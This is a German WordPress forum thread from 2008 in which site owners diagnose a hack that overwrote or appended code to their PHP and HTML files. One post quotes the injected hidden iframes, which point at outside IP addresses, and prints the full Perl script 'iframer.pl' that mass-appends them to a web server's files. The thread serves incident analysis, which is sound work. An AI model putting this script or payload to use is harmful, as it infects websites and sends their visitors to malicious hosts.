| | #1 (permalink) |
| PostRank: 0 ![]() Registriert seit: 03.02.2006
Beiträge: 8
| Ungebetenen Besuch!!! In der letzten Nacht hatte mein Weblog ungebetenen Besuch. Fast alle Dateien sind überschrieben worden so dass sie eine Größe von 620 Bytes aufweisen. Beim Aufruf der Seite wird ein weißer iFrame mit einer kleinen Grafik im linken oberen Eck angezeigt. Bei der Verwendeten Wordpressversion handelte es ist um die aktuelle Version 2.5. Wo das Leck gewesen ist kann ich noch nicht sagen, ich bin erstmal damit beschäftigt das Weblog wieder herzustellen. So viel nur mal zu Information. Wolf |
| | |
| | #3 (permalink) |
| WPD-Team ![]() Registriert seit: 20.08.2005 Ort: Berlin
Beiträge: 10.526
| Ein Plugin mit Lücken reicht auch.
__________________ Wordpress FAQ (Häufig gestellte Fragen) | Themepool"Eine gut gestellte Frage ist schon halb beantwortet." |
| | |
| | #4 (permalink) |
| PostRank: 0 ![]() Registriert seit: 03.02.2006
Beiträge: 8
| Also was mittlerweile klar ist, es hatte jemand Zugriff auf den FTP-Server. Denn es wurden nicht nur alle Wordpressdateien überschrieben, es wurden alle auf dem Webspace befindlichen .php Dateien mit dem selben Code überschrieben. Falls jemand Interesse hat, ich habe in hier bei mir auf dem Rechner. Das einzige Mal, wo ich die Daten "außer Haus" gegeben habe war beim Test der PlugIn-Funktion. Ich hoffe nicht, dass dort eine Lücke existiert. Jedenfalls hatte derjenige kein Interesse an der DB, denn die ist unversehrt geblieben. Aber selbst wenn, dann hätten mir nur ein paar Einträge gefehlt. Denn regelmäßige Datensicherungen der DB wie auch der WP-Installation sind hier selbstverständlich. |
| | |
| | #5 (permalink) | |
| PostRank: 10 ![]() Registriert seit: 30.11.2005 Ort: Oberhausen (Rhld.)
Beiträge: 1.620
| Zitat:
vG Arno
__________________ Feedback ist Wichtig!|FAQ|Rückfragen im Forum!|Wenn ich mal was vergesse.... einfach mal sagen... | |
| | |
| | #6 (permalink) |
| PostRank: 1 ![]() Registriert seit: 13.05.2007
Beiträge: 29
| Hier hatte auch jemand ungebetenen Besuch unter 2.5. Cati hat auch die Vorgehensweise beschrieben wie der Hack bei ihr verlaufen ist. WordPress-Hack, alle Versionen bis 2.5 betroffen« IT (Technik und Internet) |
| | |
| | #7 (permalink) |
| PostRank: 0 ![]() Registriert seit: 03.02.2006
Beiträge: 8
| Als kleine Ergänzung...der Zugriff erfolgte vermutlich nicht über den FTP-Zugang. Die Log-Daten für den vermuteten Zeitraum sind vollkommen in Ordnung. Was die access-zugriffe angeht, da bin ich noch am durchforsten. Aber es sind sooooo viele. Allerdings bekomme ich die Daten von gestern erst am morgigen Tag. Sollte der Zugriff also erst gestern am Tag erfolgt sein, dann sehe ich das morgen. Geändert von LonesomWolf (17.04.2008 um 18:38 Uhr). |
| | |
| | #8 (permalink) |
| PostRank: 0 ![]() Registriert seit: 07.04.2008 Ort: Köln
Beiträge: 5
| Heute hat es einen unserer Server erwischt. Ähnlich wie bei LonesomWolf wurden sehr viele Dateien überschrieben. Um genau zu sein: alle *index.php, *header.php, *footer.php, *.htm und *.html Dateien. Jeder dieser Dateien wurden zwei (2) iframes angehängt: HTML-Code: <iframe src="hXXp://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> <iframe src="hXXp://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> Durchgeführt wurde dies mithilfe eines perl scripts namens iframer.pl welche folgenden code enthält: Code: #!/usr/bin/perl
use File::Find;
$iframe = '<iframe src="http://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';
sub process_file {
if($File::Find::name =~ /index\.php/i || $File::Find::name =~ /footer\.php/i || $File::Find::name =~ /header\.php/i || $File::Find::name =~/\.htm$/i || $File::Find::name =~/\.html$/i){
open(FILE,">>$File::Find::name");
print $File::Find::name."\r\n";
print FILE $iframe;
close(FILE);
}
}
find(\&process_file,@ARGV); @LonesomWolf: bei welchem Provider liegt Dein Blog? Hast Du möglicherweise auch eine iframer.pl oder ähnliches auf den server gelegt bekommen? |
| | |
| | #9 (permalink) |
| PostRank: 3 ![]() Registriert seit: 13.07.2006
Beiträge: 112
| Scheint nicht auf Wordpress beschränkt zu sein. Hier hat jemand das Problem bei Joomla: [Problème] - Code maveillant injection d'une iframe 124.217... dans plusieurs fichiers... - Forums Joomlafacile |
| | |
| | #10 (permalink) |
| WPD-Team ![]() Registriert seit: 30.03.2008
Beiträge: 841
| Einer der betroffenen Hoster scheint all-inkl.com zu sein (laut Denic Kann jemand bestätigen, das es dort mehrere Blogs "erwischt" hat ? Ein Kompromittierung eines Massenhosters (auf einem Server laufen ca. 500++ Domains) würde es erlauben, beliebigen Domains dort was unterzuschieben. Das würde auch erklären, warum es auch Joomla erwischen kann, wie im vorherigen Post in Frankreich gefunden wurde. Geändert von codestyling (09.05.2008 um 01:44 Uhr). Grund: ergänzt |
| | |
![]() |
| Themen-Optionen | |
| Ansicht | |
| |